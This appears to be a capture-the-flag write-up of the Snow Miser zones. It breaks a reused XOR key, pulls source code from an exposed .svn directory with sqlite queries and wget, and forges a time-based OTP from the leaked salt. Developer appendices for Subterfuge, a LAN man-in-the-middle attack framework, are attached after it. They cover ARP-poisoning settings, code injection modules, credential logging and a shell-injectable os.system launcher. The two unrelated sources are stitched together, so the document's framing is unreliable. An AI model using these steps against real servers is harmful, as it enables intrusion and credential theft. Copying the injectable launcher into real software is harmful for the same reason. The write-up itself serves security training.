Let’s examine what we know. The ciphertext is exactly twice as long as the plaintext, and both plaintexts (the URLs) must start with zone-4-. The first 14 hex characters of the old and new ciphertexts are identical, which lines up with the seven characters of “zone-4-”. This gave us the hint that the same key was used to encrypt both the old and the new URL. On to the Python!

Our less than elegant solution:

# Known plaintext/ciphertext pair published "for verification", and the ciphertext we want.
known_pt = "zone-4-F7677DA8-3D77-11E2-BB65-E4BF6188709B"
known_ct = bytes.fromhex("20d916c6c29ee53c30ea1effc63b1c72147eb86b998a25c0cf1bf66939e8621b3132d83abb1683df619238")
ct_to_break = bytes.fromhex("20d916c6c29ee54343e81ff1b14c1372650cbf19998f51b5c51bf66f49ec62184034a94fc9198fa9179849")

# Recover the key byte by byte: try every key byte until key ^ plaintext reproduces the
# known ciphertext byte (equivalent to key = plaintext ^ ciphertext, but this is how we did it).
key = []
for p, c in zip(known_pt.encode(), known_ct):
    for i in range(256):
        if p ^ i == c:
            key.append(i)
            break

# The new URL was encrypted with the same key, so XOR it back out.
answer = "".join(chr(k ^ c) for k, c in zip(key, ct_to_break))
print("The URL for Zone 4 is: " + answer)

Since the length of the cipher text is exactly twice that of the plaintext we determined that Snow Miser took the ASCII of the URL and converted each character to hexadecimal. The plaintext was then encrypted using a byte-wise XOR with a one time pad (the key). XOR was assumed to be the operation performed on the two sets of bytes because an encryption algorithm is not a true encryption algorithm without XOR…right? Normally, this type of encryption would be impossible to reverse; luckily for us we were provided with a plaintext/ciphertext pairing. The python program allowed us to determine the key byte-by-byte. Once we had the key we could easily decrypt the posted ciphertext to obtain the Zone 4 URL we desired. The mess of Python above spits out the Zone 4 URL:

“zone-4-9D469367-B60E-4E08-BDF1-FED7CC74AF33”

Viewing the source gives us the KEY –> de32b158f102a60aba7de3ee8d5d265a

Zone 5:

Zone 5 is top secret! Fortunately, the link to its URL can be found in the source code:

“/zone-5-89DE9B26-CF7D-4B07-88DE-7A2F0A7B16FE/”

Additionally, Snow gives us the hint that the code is now under svn (Subversion 1.7) version control. This means that we can pull down the Subversion SQLite database by browsing to it:

“http://snowmiser.counterhack.com/zone-5-89DE9B26-CF7D-4B07-88DE-7A2F0A7B16FE/.svn/wc.db”

Heat Miser gives us a clue on what to do from here by linking to a blog post by Tim Medin entitled: “All your svn are belong to us”

“http://pen-testing.sans.org/blog/pen-testing/2012/12/06/all-your-svn-are-belong-to-us”

We open the database, check the table definitions (schema) to give ourselves a reference point, and grab the NODES:

sqlite3 wc.db
.schema
select local_relpath, ".svn/pristine/" || substr(checksum,7,2) || "/" || substr(checksum,7) || ".svn-base" as alpha from NODES;

This spits out the golden egg:

noaccess.php|$sha1$4134e0e954d144ed932fd639b5a897f9ad47fff9
index.php|$sha1$7d63810b0da679648fc20b4f1c84680ac08ec872
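Subversion 1.7 keeps a single wc.db per working copy and a pristine copy of every versioned file under .svn/pristine/, addressed by its SHA-1: the first two hex digits pick the subdirectory and the full digest names the .svn-base file, which is exactly what the substr() calls in the query above compute. The added example below (mine, not from the writeup or from Subversion) reproduces that mapping in Python against a constructed in-memory wc.db holding the two NODES rows shown above, so you can see what a .svn directory left in a web root hands to anyone who can fetch wc.db; the same listing is what to run when checking whether your own deployment exposes one. The NODES table here carries only the columns the query needs.

```python
import sqlite3

PRISTINE_PREFIX = "$sha1$"


def pristine_path(checksum):
    """Map a wc.db checksum ('$sha1$<hex>') to the pristine copy's path under .svn/."""
    if not checksum or not checksum.startswith(PRISTINE_PREFIX):
        return None
    digest = checksum[len(PRISTINE_PREFIX):]
    return f".svn/pristine/{digest[:2]}/{digest}.svn-base"


def list_pristine_paths(db):
    """Every file node in NODES with its pristine path: what an exposed .svn discloses."""
    rows = db.execute("SELECT local_relpath, checksum FROM NODES WHERE checksum IS NOT NULL")
    return {relpath: pristine_path(checksum) for relpath, checksum in rows}


def query_as_in_writeup(db):
    """The same mapping done in SQL as the writeup does it, with single-quoted string
    literals so it does not depend on SQLite accepting double-quoted strings."""
    sql = ("SELECT local_relpath, '.svn/pristine/' || substr(checksum,7,2) || '/' || "
           "substr(checksum,7) || '.svn-base' FROM NODES WHERE checksum IS NOT NULL")
    return dict(db.execute(sql).fetchall())


def sample_wc_db():
    """Constructed in-memory stand-in for a Subversion 1.7 wc.db with the two nodes
    from the writeup. The directory row has no checksum, as in a real working copy."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE NODES (wc_id INTEGER, local_relpath TEXT, kind TEXT, checksum TEXT)")
    db.executemany("INSERT INTO NODES VALUES (?, ?, ?, ?)", [
        (1, "", "dir", None),
        (1, "noaccess.php", "file", "$sha1$4134e0e954d144ed932fd639b5a897f9ad47fff9"),
        (1, "index.php", "file", "$sha1$7d63810b0da679648fc20b4f1c84680ac08ec872"),
    ])
    return db


if __name__ == "__main__":
    db = sample_wc_db()
    for relpath, path in list_pristine_paths(db).items():
        print(f"{relpath:15} -> {path}")
    print("SQL and Python agree:", list_pristine_paths(db) == query_as_in_writeup(db))
```

Denying access to /.svn/ (and /.git/) at the web server, or deploying with svn export instead of a checkout, is the fix; the pristine copies are the full server-side source, not a listing.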

The next step is to get to the Zone 5 controller. Execute the following:

wget -O - http://snowmiser.counterhack.com/zone-5-89DE9B26-CF7D-4B07-88DE-7A2F0A7B16FE/.svn/pristine/41/4134e0e954d144ed932fd639b5a897f9ad47fff9.svn-base

wget -O - http://snowmiser.counterhack.com/zone-5-89DE9B26-CF7D-4B07-88DE-7A2F0A7B16FE/.svn/pristine/7d/7d63810b0da679648fc20b4f1c84680ac08ec872.svn-base

This returns the following output:

<?php
$accessallowed = FALSE;
$zone=5;
$content = "<h1>Access Denied</h1>\n<!-- current server time is ".date('Y-m-d H:i').' -->';
require_once('../include/template.inc.php');

----------------------------------------------------------------------------------

<?php
function generate_otp($time) {
    $pass = sha1("$time 7998f77a7dc74f182a76219d7ee58db38be3841c");
    return($pass);
}

function verify_otp($inpass) {
    // passwords are valid for up to 3 minutes
    // don't forget to use the server time (see the noaccess.php page)

    $validstamps = array(
        date('Y-m-d H:i', strtotime('+1 minute')), // added just in case the time sync is off
        date('Y-m-d H:i'),
        date('Y-m-d H:i', strtotime('-1 minute')),
        date('Y-m-d H:i', strtotime('-2 minute')),
    );

    foreach ($validstamps as $stamp) {
        if (strtolower($inpass) == generate_otp($stamp))
            return TRUE;
    }
    return FALSE;
}

if ((array_key_exists('otp', $_POST) && verify_otp($_POST['otp'])) || (array_key_exists('otp', $_COOKIE) && verify_otp($_COOKIE['otp']))) {
    setcookie('otp', generate_otp(date('Y-m-d H:i')));
} else {
    header( 'Location: noaccess.php' );
    die();
}

$accessallowed = TRUE;
$zone=5;
require_once('../include/template.inc.php');
?>

Uh oh! Access Denied, but we did manage to get some of the server side code pertaining to the Controller’s page. Examining it gives us insight. We need to hand the server a password in order to gain access to the Controller. Fortunately, the recovered index.php tells us how to make a time based password, but to do that we need to get ahold of the server time, which can be found in the source of noaccess.php. Back to the Python!

import hashlib
# The static value appended to the server time in generate_otp(), as recovered from index.php.
salt = "7998f77a7dc74f182a76219d7ee58db38be3841c"
# Server time taken from the noaccess.php source; PHP's sha1("$time $salt") puts a space between them.
print(hashlib.sha1(("2012-12-16 20:17 " + salt).encode()).hexdigest())

Output:           f614951b7f741dbbead5d47d285fcc47b1e63aec

We now have a three minute window to take the output and authenticate into the Zone 5 Controller from the Zone 4 page. That’s it!
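To make the window concrete, here is an added Python re-implementation of the recovered generate_otp()/verify_otp() logic (example code written for this writeup, not the challenge's own code); it assumes only the salt and the date('Y-m-d H:i') format shown above, and adds acceptance_window() to show for how long a token minted for one minute stamp stays valid.

```python
import hashlib
from datetime import datetime, timedelta

# Constructed example mirroring the recovered PHP, not code from the challenge itself.
SALT = "7998f77a7dc74f182a76219d7ee58db38be3841c"   # constant taken from generate_otp() above

def stamp(t):
    """Format a datetime like the PHP date('Y-m-d H:i') call: minute resolution."""
    return t.strftime("%Y-%m-%d %H:%M")

def generate_otp(time_str, salt=SALT):
    """Mirror of generate_otp(): sha1("$time <salt>") as lowercase hex."""
    return hashlib.sha1((time_str + " " + salt).encode("ascii")).hexdigest()

def valid_stamps(server_now):
    """The four minute stamps the server accepts: +1, 0, -1 and -2 minutes
    relative to its own clock (the +1 covers clock skew, per the PHP comment)."""
    return [stamp(server_now + timedelta(minutes=m)) for m in (1, 0, -1, -2)]

def verify_otp(inpass, server_now):
    """Mirror of verify_otp(): case-insensitive match against the window."""
    return any(inpass.lower() == generate_otp(s) for s in valid_stamps(server_now))

def acceptance_window(server_now):
    """Earliest and latest server minute at which a token minted for the stamp
    server_now is still accepted: one minute early through two minutes late."""
    first = stamp(server_now - timedelta(minutes=1))
    last = stamp(server_now + timedelta(minutes=2))
    return first, last

# Security note: the only secret here is SALT, and it sits in the source that the
# exposed .svn/pristine store handed out. Anyone who can read the server time from
# noaccess.php can therefore mint an acceptable token; a real OTP check would use an
# HMAC keyed with a secret kept outside the web root and a constant-time compare.

if __name__ == "__main__":
    server = datetime(2012, 12, 16, 20, 17)            # the time quoted in the writeup
    token = generate_otp(stamp(server))
    print(token, verify_otp(token, server), acceptance_window(server))
```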

Viewing the source gives us the KEY -> 3ab1c5fa327343721bc798f116be8dc6

Snow Miser Answers at a Glance:

(screenshot: summary of the Snow Miser answers)

And that’s it! Hope you all enjoyed the writeup.

Appendices

Appendix A: Subterfuge Functions

Setting your SYS Path

In order to access the resources in Subterfuge’s main directory

import sys
sys.path.append('/usr/share/subterfuge/')
sys.path.append('/usr/share/subterfuge/utilities')

This adds the main Subterfuge directory as well as the primary utilities directory into your program’s path. From there you can simply call built in functions and utilities without having to specify an absolute location every time.

How to Get Global Variables

Getting the global attack variables in Subterfuge is simple. Just add the following line to the header of your code:

from subutils import globalvars

The next step is to call the function and assign the output:

globalvar = globalvars()

The function: globalvars() returns a dictionary of all of the attack variables accessed from the database. Accessing a specific entry in the dictionary is simple:

print globalvar['gateway']

The above code will print the LAN's default gateway as recorded by Subterfuge. You can use the same method to access the other global attack settings, which are the following fields of the main_setup table:

Field        Description
ip           The IP address of the Subterfuge machine
iface        The interface used in the attack
gateway      The original default gateway of the LAN
autoconf     A Boolean value that determines whether auto-configuration is active
ploadrate    The interval over which Subterfuge refreshes attack information
injectrate   The interval Subterfuge waits between code injections
arprate      The interval Subterfuge waits between sending ARP packets
smartarp     A Boolean value that determines whether Dynamic Poison Retention is active
routermac    The MAC address of the LAN's router
autoupdate   A Boolean value that determines whether Subterfuge checks for updates automatically on startup

Adding Additional Logic to Third Party Modules

The Subterfuge Module Builder automates the standard configuration of a module for you, but often you need to have just a bit more control. What follows is a short primer on how to do just that.

The file that handles Subterfuge’s modules is: modules/views.py. The default code generated by Subterfuge looks like this:

import os

#################################
#TUNNEL BLOCK MODULE
#################################
def tunnelblock():
    # note the space after 'python': without it the interpreter name and the path run together
    os.system('python ' + str(os.path.dirname(os.path.abspath(__file__))) + '/TunnelBlock/TunnelBlock.py')

You can modify or add any code here to produce the result that you want. For instance, in the HTTP Code Injection Module we needed a bit more control and a few more features. What we ended up with is this:

#################################
#HTTP CODE INJECTION MOD
#################################
def httpcodeinjection(request, conf):
    #HTTP CODE INJECTION MODULE CONFIGURATION
    #Defaults, so the launch command below never references an unset name
    method = ""
    payload = ""
    exploit = ""

    #Status
    status = request.POST["status"]

    #Vector
    if request.POST.get("vector"):
        exploit = request.POST["vector"] + "\n"
        method = "metasploit"

    #Payload
    if request.POST.get("payload"):
        payload = request.POST["payload"] + "\n"

    if request.POST.get("custominject"):
        exploit = ""
        payload = ""
        method = "custom"

        #Write Custom Inject into File
        with open(str(os.path.dirname(__file__)) + '/httpcodeinjection/inject.x', 'w') as f:
            f.writelines(request.POST["custominject"])

    installed.objects.filter(name = "httpcodeinjection").update(active = status)

    #method and payload come straight from the POST body and are spliced into a shell
    #command string, so anything with shell metacharacters in those fields reaches sh unescaped
    os.system('xterm -e sh -c "python ' + str(os.path.dirname(os.path.abspath(__file__))) + '/httpcodeinjection/httpcodeinjection.py ' + method + ' ' + payload + '" &')

Note: Module code is typically stored under the following naming scheme:
          modules/<modulename>/<modulename>.py
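As an added example (not Subterfuge's own code), the launcher below does the same job as the os.system() call at the end of httpcodeinjection() but hands the module path, method and payload to subprocess as separate arguments, so nothing taken from request.POST is ever parsed by a shell; module_dir, module_command() and launch_module() are hypothetical names.

```python
import os
import subprocess

# Added example, not Subterfuge's code: the view above concatenates POST fields into a
# shell string for os.system(). Passing an argv list instead keeps each field a single,
# literal argument no matter what characters it contains.

ALLOWED_METHODS = ("metasploit", "custom")   # the two values the page's view assigns

def module_script(module_dir, name):
    """Path of a module's entry point, following modules/<modulename>/<modulename>.py."""
    return os.path.join(module_dir, name, name + ".py")

def module_command(module_dir, method, payload):
    """Return the argv list for launching the module; unknown methods are rejected
    instead of being forwarded to the script."""
    if method not in ALLOWED_METHODS:
        raise ValueError("unknown method: %r" % method)
    # Each list element is one argv entry: quotes, ';' or '&' in payload stay literal.
    return ["python", module_script(module_dir, "httpcodeinjection"), method, payload]

def launch_module(module_dir, method, payload):
    """Start the module in the background without a shell (hypothetical replacement
    for the os.system() call; prepend ["xterm", "-e"] to the list if a window is wanted)."""
    return subprocess.Popen(module_command(module_dir, method, payload))
```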

 

Using the Subterfuge Notification System

Subterfuge is capable of sending alerts and notifications to users. The file that handles this interaction is: utilities/notification.py. Notifications serve a dual purpose of providing error logging and troubleshooting guidance. To add your own notifications run the program with the following syntax:

os.system("python notification.py 'title' 'message'")

Appendix B: Subterfuge Database

Basics on the Subterfuge Database

Subterfuge uses a SQLite database for portability. The database is accessed through Django's ORM, which makes access fairly simple, if syntactically different from what you may be familiar with. For queries not covered here, refer to Django's documentation[1].

Select Statement:

creds = credentials.objects.all()

Insert Statement:

logcred = credentials(username = username, password = password)
logcred.save()

Update Statement:

setup.objects.update(value = newvalue)

That's all it takes to do basic database operations in Subterfuge; however, to run database queries from a file outside views.py you may need to import the following:

#Ignore Deprecation Warnings
import warnings
warnings.filterwarnings("ignore", category=DeprecationWarning)
import os
from django.conf import settings

#Configure Database
settings.configure(DATABASE_ENGINE="sqlite3",
                   DATABASE_HOST="",
                   DATABASE_NAME= os.path.dirname(__file__) + "/db",
                   DATABASE_USER="",
                   DATABASE_PASSWORD="")

from django.db import models

#Import Tables
from main.models import *

Using the Subterfuge Database in your Modules

To access Subterfuge's database from your modules you must first import several dependencies.

References:

 

Special Thanks to:

Maj David Merritt

Lt Christopher Shields ~ r00t0v3rr1d3

n37tdiv3r5

References for Frontend Development

Django Template Language:

https://docs.djangoproject.com/en/dev/topics/templates/

Python Programming Language:

http://docs.python.org/

SANS WPAD Hijacking:

http://it-audit.sans.org/blog/2011/10/03/browser-security-man-in-the-middle-with-wpad

[1] Django documentation: https://docs.djangoproject.com/en/dev/topics/templates/

Contributing to the Project

I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it’s because I screwed it up. Not because it doesn’t like me… Or feels threatened by me…

The Mentor

Vision

Subterfuge is still a work in progress. The project has seen an exciting amount of community support, but we still have a long way to go. Our goal is to create an all-encompassing framework from which to easily launch attacks against the LAN. Subterfuge will continue to integrate with other pieces of the penetration tester’s toolkit to allow a user to efficiently conduct a full spectrum penetration test.

In the future we would like Subterfuge to contain a database of possible attack methods and vectors in order to demonstrate the risk and the vulnerability respectively. Because of the modular nature of the framework, expanding it should continue to be simple.

What can you do?

If you're interested in contributing to the Subterfuge Project we might be able to use your help. As the framework is still in Beta, any reviews, comments, or critiques are helpful. We also appreciate any and all issues logged on our Google Code site; we try to get to those bugs as quickly as possible. If you would like to go a step further, feel free to contact us with suggestions, or develop your own modules. If you submit them to us we'll try to get them added to the package for you.

Other than that the simple support you all give is always helpful. Thanks. Now go hack!